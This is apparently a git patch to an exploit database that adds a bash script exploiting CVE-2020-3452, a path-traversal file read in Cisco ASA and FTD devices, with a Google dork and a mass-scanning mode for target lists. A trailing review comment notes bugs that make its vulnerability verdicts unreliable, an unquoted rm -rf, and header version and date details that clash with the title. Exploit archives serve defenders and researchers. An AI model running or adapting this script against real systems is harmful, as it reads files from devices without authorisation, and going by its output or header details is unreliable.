From d8411b66138d6889b42b49e6375778b557da18be Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 29 Jul 2020 05:02:05 +0000 Subject: [PATCH] DB: 2020-07-29 1 changes to exploits/shellcodes Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion --- exploits/hardware/webapps/48722.txt | 96 +++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 97 insertions(+) create mode 100644 exploits/hardware/webapps/48722.txt
diff --git a/exploits/hardware/webapps/48722.txt b/exploits/hardware/webapps/48722.txt
new file mode 100644
index 000000000..2f67bbcfc
--- /dev/null
+++ b/exploits/hardware/webapps/48722.txt
@@ -0,0 +1,96 @@
+# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
+# Google Dork: inurl:/+CSCOE+/
+# Date: 2020-08-27
+# Exploit Author: 0xmmnbassel
+# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
+# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
+# Vulnerability Type: unauthenticated file read
+# CVE: CVE-2020-3452
+
+
+#!/bin/bash
+
+
+read="%2bCSCOE%2b/portal_inc.lua"
+
+
+helpFunction()
+{
+ echo ""
+ echo -e "\t\tCVE-2020-3452"
+ echo ""
+ echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
+ echo -e "\t-l for list of IPs in text file"
+ echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua"
+ echo -e "\t-i for single IP test"
+ exit 1
+}
+
+while getopts "l:r:i:" opt
+do
+ case "$opt" in
+ l ) input="$OPTARG" ;;
+ r ) read="$OPTARG" ;;
+ i ) website="$OPTARG" ;;
+ ? ) helpFunction ;;
+ esac
+done
+
+
+
+#if $website is empty or $input is empty
+if [ -z "$website" ] && [ -z "$input" ]
+then
+ echo "Some/all of the parameters are empty";
+ helpFunction
+fi
+
+#usage
+
+
+if [ -z "$website"];
+ then
+ while IFS= read -r line
+ do
+ name=$(echo $line | cut -c9-19)
+ #echo "testing $line"
+ filename="$name.txt"
+ #echo $response
+ status=$(curl -LI $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s)
+
+ if [ $status -eq "400" ]; then
+ echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
+ else
+ wget "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
+
+ if [ -s $filename ]; then
+ echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
+ echo "downloaded!, $line is vulnerable to CVE-2020-3452."
+
+ else
+ echo "not vulnerable!"
+ rm -rf $filename
+ fi
+ fi
+ done < "$input"
+ else
+
+ name=$(echo $website | cut -c9-16)
+ filename="$name.txt"
+
+ status=$(curl -LI $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s)
+ if [ $status -eq "Bad Request" ]; then
+ echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
+ else
+
+ echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
+ wget "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
+ if [ -s $filename ]; then
+ echo "downloaded!, $website is vulnerable to CVE-2020-3452."
+ else
+ echo "not vulnerable!"
+ rm -rf $filename
+ fi
+ fi
+
+fi
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0c72d14a4..45595a3dd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42964,3 +42964,4 @@ id,file,description,date,author,type,platform,port
 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
+48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
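Review bot: In the single-target branch of 48722.txt the status test `if [ $status -eq "Bad Request" ]; then` compares an integer with a string, so `[` fails with an error and the `else` path always runs; it should mirror the list branch as `if [ "$status" -eq 400 ]; then`. The outer test `if [ -z "$website"];` is also missing the space before `]` and appears to pick the right branch only by accident. Both branches then base the verdict solely on `[ -s $filename ]`, so any non-empty response body (an error or login page, for instance) is reported as vulnerable, which makes the output unreliable for confirming that a device has been patched. `$name` is cut from the input line and used unquoted in `-O $name.txt` and `rm -rf $filename`, so an entry containing spaces, `/` or glob characters can write or delete files outside the intended output; quote the expansions and use `rm -f -- "$filename"`. The header's `# Version:` line (`>=9.14 except 9.11`) and `# Date: 2020-08-27` disagree with the title and the commit date, so affected and fixed releases should be taken from the linked Cisco advisory rather than from this header.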